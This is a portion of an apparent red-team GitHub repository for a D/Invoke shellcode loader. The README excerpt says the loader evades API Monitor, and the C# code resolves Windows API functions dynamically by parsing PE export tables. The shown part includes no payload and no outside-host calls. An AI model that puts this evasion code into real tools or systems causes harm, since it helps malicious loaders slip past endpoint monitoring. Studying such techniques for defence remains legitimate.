1. You could see the picture below, the SimpleLoader' s API call caught by API monitor. 52 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result1.png) 53 | 54 | 2. And the **DInvoke ShellcodeLoader**'s API call was not caught by API monitor. 55 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result2.png) 56 | 57 | 58 | ## Reference link: 59 | 60 | 1. https://github.com/CCob/SharpBlock 61 | 2. https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/ 62 | 3. https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/ 63 | 4. https://thewover.github.io/Dynamic-Invoke/ 64 | 5. https://offensivedefence.co.uk/posts/dinvoke-syscalls/ 65 | 6. https://github.com/TheWover/DInvoke 66 | 7. http://www.rohitab.com/discuss/topic/38807-api-monitor-v2-r10-release-instant-monitoring-without-definitions-support-for-dllmain-and-early-apis-windows-8/ 67 | 8. https://vimeo.com/566964438 68 | 9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread 69 | 10. https://docs.microsoft.com/en-us/dotnet/api/microsoft.visualstudio.shell.interop.vsdebugstartupinfo.dwcreationflags?view=visualstudiosdk-2019 70 | 71 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/DInvoke_shellcodeload.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87} 8 | Exe 9 | DInvoke_test 10 | DInvoke_test 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | true 57 | bin\x86\Debug\ 58 | DEBUG;TRACE 59 | full 60 | x86 61 | 7.3 62 | prompt 63 | true 64 | 65 | 66 | bin\x86\Release\ 67 | TRACE 68 | true 69 | pdbonly 70 | x86 71 | 7.3 72 | prompt 73 | true 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/DInvokeFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Runtime.InteropServices; 8 | using System.IO; 9 | 10 | namespace DInvoke_Code 11 | { 12 | public class DInvokeFunctions 13 | { 14 | 15 | public static IntPtr GetLoadedModuleAddress(string DLLName) 16 | { 17 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 18 | foreach (ProcessModule Mod in ProcModules) 19 | { 20 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 21 | { 22 | return Mod.BaseAddress; 23 | } 24 | } 25 | return IntPtr.Zero; 26 | } 27 | 28 | 29 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 30 | { 31 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 32 | if (hModule == IntPtr.Zero && CanLoadFromDisk) 33 | { 34 | hModule = LoadModuleFromDisk(DLLName); 35 | if (hModule == IntPtr.Zero) 36 | { 37 | throw new FileNotFoundException(DLLName + ", unable to find the specified file."); 38 | } 39 | } 40 | else if (hModule == IntPtr.Zero) 41 | { 42 | throw new DllNotFoundException(DLLName + ", Dll was not found."); 43 | } 44 | 45 | return GetExportAddress(hModule, FunctionName); 46 | } 47 | 48 | 49 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 50 | { 51 | IntPtr FunctionPtr = IntPtr.Zero; 52 | try 53 | { 54 | 55 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 56 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 57 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 58 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 59 | Int64 pExport = 0; 60 | if (Magic == 0x010b) 61 | { 62 | pExport = OptHeader + 0x60; 63 | } 64 | else 65 | { 66 | pExport = OptHeader + 0x70; 67 | } 68 | 69 | 70 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 71 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 72 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 73 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 74 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 75 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 76 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 77 | 78 | for (int i = 0; i < NumberOfNames; i++) 79 | { 80 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 81 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 82 | { 83 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 84 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 85 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 86 | break; 87 | } 88 | } 89 | } 90 | catch 91 | { 92 | // Catch parser failure 93 | throw new InvalidOperationException("Failed to parse module exports."); 94 | } 95 | 96 | if (FunctionPtr == IntPtr.Zero) 97 | { 98 | // Export not found 99 | throw new MissingMethodException(ExportName + ", export not found."); 100 | } 101 | return FunctionPtr; 102 | } 103 | 104 | public static IntPtr LoadModuleFromDisk(string DLLPath) 105 | { 106 | /* 107 | Data.Native.UNICODE_STRING uModuleName = new Data.Native.UNICODE_STRING(); 108 | Native.RtlInitUnicodeString(ref uModuleName, DLLPath); 109 | 110 | IntPtr hModule = IntPtr.Zero; 111 | Data.Native.NTSTATUS CallResult = Native.LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule); 112 | if (CallResult != Data.Native.NTSTATUS.Success || hModule == IntPtr.Zero) 113 | { 114 | return IntPtr.Zero; 115 | } 116 | */ 117 | IntPtr hModule = IntPtr.Zero; 118 | return hModule; 119 | } 120 | } 121 | } 122 | --------------------------------------------------------------------------------